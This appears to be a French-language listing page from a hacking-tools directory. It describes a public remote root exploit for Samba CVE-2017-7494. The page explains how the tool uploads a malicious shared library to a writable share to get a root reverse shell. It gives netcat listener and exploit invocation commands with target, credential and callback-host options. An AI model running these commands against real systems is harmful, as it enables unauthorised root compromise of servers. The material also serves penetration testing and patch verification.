Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-7494 — Remote root exploit for the SAMBA CVE-2017-7494 vulnerability | Kitploit
Outils/GitHubGitHub/joxeankoret/cve-2017-7494
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access ToolArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

Voir le dépôt
25974il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-7494

Exploit root à distance pour la vulnérabilité SAMBA CVE-2017-7494.

Détails

Cet exploit est divisé en 2 parties :

  • Premièrement, il compile une charge utile appelée « implant.c » et génère une bibliothèque (libimplantx32.so ou libimplantx64.so) qui passe à l'utilisateur root, se détache du processus parent et lance un shell inversé.
  • Deuxièmement, il trouve un partage accessible en écriture sur l'hôte cible spécifié, télécharge la bibliothèque avec un nom aléatoire et tente de la charger.

Tant que la cible est vulnérable et que la charge utile est correcte pour le système d'exploitation et l'architecture cibles, l'exploit est fiable à 100 %.

Utilisation

Sur votre machine, exécutez la commande suivante :

root@kitploit:~
$ nc -p 31337 -l

Ensuite, exécutez l'exploit contre votre cible et attendez qu'il se connecte à votre Netcat :

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Si vous fermez trop rapidement le shell inversé, au lieu de relancer l'exploit en téléchargeant le module, etc., vous pouvez simplement passer le chemin du module déjà téléchargé. En supposant qu'il a été téléchargé vers /shared/directory/ sous le nom « module.so », vous exécuteriez une commande comme celle-ci :

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

MISE À JOUR 25/11/2017 - Archivaldo

Vous pouvez désormais exécuter l'exploit contre Samba 3.5.0 et 3.6.0, il suffit d'ajouter l'argument -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Vous pouvez désormais utiliser votre propre .so personnalisé

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Si vous devez exécuter ce script depuis une machine x86, la compilation des binaires de l'implant créera deux fichiers x86. En utilisant le flag -n 1, vous pouvez désactiver la compilation et copier libimplantx64.so depuis une autre machine.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Au cas où Samba s'exécuterait uniquement sur le port 139. Vous pouvez définir le port du serveur distant à l'aide de l'argument -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTES

Je ne le supporte plus.

-- Joxean Koret

Télécharger l’outil